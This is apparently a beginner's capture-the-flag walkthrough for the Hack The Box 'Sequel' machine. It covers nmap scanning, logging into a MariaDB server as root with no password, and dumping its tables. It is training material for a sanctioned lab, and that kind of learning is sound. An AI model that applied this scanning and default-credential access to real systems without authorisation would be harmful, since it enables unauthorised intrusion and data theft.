The aim of this walkthrough is to provide help with the Sequel machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.

It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 1 challenges.


There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.

Once our connection is taken care of, we spawn the target machine.

Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.

└──╼ $rhost=<target-hosts-ip>
└──╼ $ echo $rhost 
└──╼ $

You could use the unset command to remove it after you no longer need it.

└──╼ $unset rhost 
└──╼ $


Question: During our scan, which port do we find serving MySQL?

Let’s start our recon with an all-port nmap scan. Use the -V5 option to set the timing template to the fastest.

└──╼ $nmap -p- -T5 $rhost 
Starting Nmap 7.93 ( ) at 2023-05-05 20:46 BST
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for
Host is up (0.037s latency).
Not shown: 62285 closed tcp ports (conn-refused), 3249 filtered tcp ports (no-response)
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 69.04 seconds
└──╼ $



Question: What community-developed MySQL version is the target running?

Well, running nmap with the -sV to detect the service and it’s version does not help us (program hangs).

└──╼ $nmap -p 3306 -sV $rhost -vvv
Starting Nmap 7.93 ( ) at 2023-05-05 21:02 BST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 21:02
Scanning [2 ports]
Completed Ping Scan at 21:02, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:02
Completed Parallel DNS resolution of 1 host. at 21:02, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 21:02
Scanning [1 port]
Discovered open port 3306/tcp on
Completed Connect Scan at 21:02, 0.01s elapsed (1 total ports)
Initiating Service scan at 21:02
Scanning 1 service on

We try again, but this time we only run scripts from the safe category (--script=safe option).

└──╼ $nmap -p 3306 --script=safe $rhost
Starting Nmap 7.93 ( ) at 2023-05-05 21:13 BST
Pre-scan script results:
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
|_broadcast-wpad-discover: Failed to retrieve wpad.dat ( from server
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See
Nmap scan report for
Host is up (0.013s latency).

3306/tcp open  mysql
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 124
|   Capabilities flags: 63486
|   Some Capabilities: IgnoreSpaceBeforeParenthesis, InteractiveClient, LongColumnFlag, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, ConnectWithDatabase, IgnoreSigpipes, Support41Auth, Speaks41ProtocolNew, SupportsLoadDataLocal, ODBCClient, SupportsTransactions, SupportsCompression, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: zP_k{KAG}dYsW;_L>1{<
|_  Auth Plugin Name: mysql_native_password

Host script results:
| port-states: 
|   tcp: 
|_    open: 3306
| unusual-port: 
|_  WARNING: this script depends on Nmap's service/version detection (-sV)
| dns-blacklist: 
|   SPAM
|_ - FAIL
|_fcrdns: FAIL (No PTR record)

Post-scan script results:
| reverse-index: 
|_  3306/tcp:
Nmap done: 1 IP address (1 host up) scanned in 112.12 seconds
└──╼ $



Question: When using the MySQL command line client, what switch do we need to use in order to specify a login username?

Using the program’s built-in help can help us identifying the correct options we need to use.

└──╼ $mysql --help
mysql  Ver 15.1 Distrib 10.5.19-MariaDB, for debian-linux-gnu (x86_64) using  EditLine wrapper
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Usage: mysql [OPTIONS] [database]
  -u, --user=name     User for login if not current user.
└──╼ $



Question: Which username allows us to log into this MariaDB instance without providing a password?

Why not try some default credentials?

└──╼ $mysql -h $rhost -u root
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 147
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 



Question: In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?

Reading up a bit on sql should provide you with the desired answer.



Question: In SQL, what symbol do we need to end each query with?

It is literally displayed by the MariaDB welcome message.



Question: There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that’s unique to this host?

Use the show command to list out all the available databases.

MariaDB [(none)]> show databases;
| Database           |
| htb                |
| information_schema |
| mysql              |
| performance_schema |
4 rows in set (0.014 sec)

MariaDB [(none)]> 

From these, the only one that particularly stands out is the htb database.



Question: Submit root flag

Try and dump the contents of the htb database. One way to do this is to first select the htb database and then list all it’s tables.

MariaDB [(none)]> use htb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> show tables;
| Tables_in_htb |
| config        |
| users         |
2 rows in set (0.011 sec)

MariaDB [htb]>

Dump all the data in the tables. Use the information obtained in the previous tasks to solve this.

useful informationtask
usage of *TASK5
usage of ;TASK6
targeted databaseTASK7

The only missing piece of information is the select command which we can easily look up online.

MariaDB [htb]> select * from config;
| id | name                  | value                            |
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | <flag>                           |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
7 rows in set (0.012 sec)

MariaDB [htb]> select * from users; 
| id | username | email            |
|  1 | admin    | admin@sequel.htb |
|  2 | lara     | lara@sequel.htb  |
|  3 | sam      | sam@sequel.htb   |
|  4 | mary     | mary@sequel.htb  |
4 rows in set (0.012 sec)

MariaDB [htb]>

The flag is in the config table.


Make sure to terminate the target box before you continue with the next machine!